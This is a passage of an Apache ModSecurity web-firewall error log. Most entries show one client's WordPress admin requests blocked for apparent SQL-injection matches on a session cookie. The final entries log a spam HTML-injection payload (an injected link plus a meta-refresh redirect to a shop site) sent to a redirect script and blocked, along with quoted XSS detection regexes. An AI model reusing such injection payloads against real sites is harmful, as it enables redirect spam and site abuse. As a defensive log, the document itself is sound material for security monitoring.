"/wp-admin/"] [unique_id "agI6qXo_DFxNSZVmaX3OlAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:05.835896 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6qXo_DFxNSZVmaX3OlAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:06.193462 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6qXo_DFxNSZVmaX3OlAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:09.144827 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6rXo_DFxNSZVmaX3OpgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:09.145119 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6rXo_DFxNSZVmaX3OpgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:09.738815 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6rXo_DFxNSZVmaX3OpgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:11.453573 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6r3o_DFxNSZVmaX3OqAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:11.453854 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6r3o_DFxNSZVmaX3OqAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:12.077834 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6r3o_DFxNSZVmaX3OqAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:13.156401 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6sXo_DFxNSZVmaX3OqwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:13.156678 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6sXo_DFxNSZVmaX3OqwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:13.737450 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6sXo_DFxNSZVmaX3OqwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:16.745273 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6tHo_DFxNSZVmaX3OsAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:16.745558 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6tHo_DFxNSZVmaX3OsAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:17.291356 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6tHo_DFxNSZVmaX3OsAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:17.539247 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6tXo_DFxNSZVmaX3OswAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:17.539532 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6tXo_DFxNSZVmaX3OswAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:18.101782 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6tXo_DFxNSZVmaX3OswAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:18.831133 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6tno_DFxNSZVmaX3OtgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:18.831426 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6tno_DFxNSZVmaX3OtgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:19.185548 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6tno_DFxNSZVmaX3OtgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:20.760614 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6uHo_DFxNSZVmaX3OuAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:20.760902 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6uHo_DFxNSZVmaX3OuAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:21.374339 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6uHo_DFxNSZVmaX3OuAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:22.145990 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6uno_DFxNSZVmaX3OugAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:22.146393 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6uno_DFxNSZVmaX3OugAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:22.737458 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6uno_DFxNSZVmaX3OugAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:23.308818 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
[Mon May 11 22:23:23.310032 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
[Mon May 11 22:23:23.310219 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
[Mon May 11 22:23:23.310508 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
[Mon May 11 22:23:23.312106 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
[Mon May 11 22:23:23.312555 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
